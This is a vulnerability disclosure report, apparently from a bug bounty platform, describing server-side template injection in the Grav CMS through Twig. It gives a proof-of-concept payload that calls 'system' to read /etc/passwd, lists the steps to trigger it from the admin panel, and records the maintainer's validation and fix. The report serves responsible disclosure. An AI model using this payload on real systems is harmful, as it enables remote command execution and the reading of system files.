Server Side Template Injection in getgrav/grav

Valid

Reported on

Apr 7th 2022


Description

Grav is vulnerable to Server Side Template Injection via Twig. According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system.

PoC video.

Proof of Concept

Payload:

{{['cat\x20/etc/passwd']|filter('system')}}
  1. With an authenticated user, access the admin panel.
  2. Edit a page, enabling Twig in the Advanced tab.
  3. Put the payload in the content.
  4. Save and check out the post.

Impact

Remote Command execution

References

We are processing your report and will contact the getgrav/grav team within 24 hours. 4 months ago
Renan Rocha modified the report
4 months ago
We have contacted a member of the getgrav/grav team and are waiting to hear back 4 months ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the getgrav/grav team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the getgrav/grav team. This report is now considered stale. 3 months ago
Matias Griese modified the Severity from Critical (9.1) to Critical (9.9) 2 months ago
Matias Griese modified the Severity from Critical (9.9) to Critical (9.1) 2 months ago
Matias Griese
2 months ago

Maintainer


This issue has been fixed, but we're waiting for a release before going public.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Matias Griese validated this vulnerability 2 months ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the getgrav/grav team. We will try again in 7 days. 2 months ago
We have sent a second fix follow up to the getgrav/grav team. We will try again in 10 days. a month ago
Matias Griese confirmed that a fix has been merged on 9d6a2d a month ago
Matias Griese has been awarded the fix bounty
Twig.php#L164-L210 has been validated
to join this conversation